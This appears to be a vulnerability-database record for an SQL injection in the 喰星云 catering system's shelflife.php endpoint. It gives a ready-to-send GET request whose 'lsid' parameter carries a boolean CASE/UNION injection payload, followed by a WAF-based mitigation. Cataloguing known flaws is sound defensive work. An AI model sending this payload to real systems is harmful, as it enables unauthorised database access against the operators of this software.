vendor = "喰星云"
name = "喰星云-数字化餐饮服务系统shelflife.php存在SQL注入漏洞"
type = "SQL注入"
version = "未知"
path = "/logistics/home_warning/php/shelflife.php"
detail = "GET /logistics/home_warning/php/shelflife.php?do=getList&lsid=(SELECT+(CASE+WHEN+(6191=6193)+THEN+%27%27+ELSE+(SELECT+9641+UNION+SELECT+2384)+END)) HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
fix = "WAF封禁路路径，等待发布补丁"
date = "0813"
label = "nday"
